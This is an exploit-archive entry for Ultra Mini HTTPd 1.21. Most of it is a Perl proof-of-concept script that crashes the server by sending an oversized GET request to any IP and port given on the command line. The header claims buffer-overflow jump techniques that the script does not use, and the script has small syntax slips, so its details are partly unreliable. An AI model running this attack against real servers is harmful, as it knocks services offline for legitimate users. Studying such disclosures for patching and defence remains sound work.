id: 39212
date: 01/02/2024
title: Ultra Mini HTTPd 1.21 Denial Of Service Exploit
author: Fernando Mengali
cves: 

# Exploit Title: Ultra Mini HTTPd 1.21 - Denial of Service (DoS)
# Discovery by: Fernando Mengali
# Vendor Homepage: https://acme.com/
# Software Link: https://acme.com/
# Notification vendor: Yes reported
# Tested Version: Ultra Mini HTTPd 1.21
# Tested on: Window XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)
# Vídeo: https://www.youtube.com/watch?v=HWOGeg3e5As

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
#For this exploit I have tried several strategies to increase reliability and performance:
#Jump to a static 'call esp'
#Backwards jump to code a known distance from the stack pointer.
#The server did not properly handle request with large amounts of data via GET.
#The following request sends a large amount of data to the web server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){
      $cmd="cls";
    } else {
      $cmd="clear";
    }

    system("$cmd");
    
    intro();
    main();
    
    print "[+] Exploiting... \n";

    my $buffer = "\x41"x192;

    my $payload = 'A' x 5438 . $buffer;
    my $i=0;
    while (i < 1) {
    
    my $socket = IO::Socket::INET->new(
        PeerAddr => $ip,
        PeerPort => $port,
        Proto    => 'tcp',
    ) or die "Can't connect!!!!! \n\n";
    my $payload = "GET / $payload HTTP/1.1\r\nHost:$ip\r\n\r\n";
    $socket->send($payload);
    close($socket);
    $i++;
    }

      print "[+] Exploited success!!!!!\n\n";
  
   sub intro {
      print "***************************************************\n";
      print "*    Ultra Mini HTTPd 1.21 - Denied of Service    *\n";
      print "*                                                 *\n";
      print "*            Coded by Fernando Mengali            *\n";
      print "*                                                 *\n";
      print "*      e-mail: fernando.mengalli\@gmail.com       *\n";
      print "*                                                 *\n";
      print "***************************************************\n";
  }

  sub main {

      our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";
        exit(-1);

      }
  }

#3. Solution/ How to fix:

# This version product is deprecated.

#  0day.today [2024-01-15]  #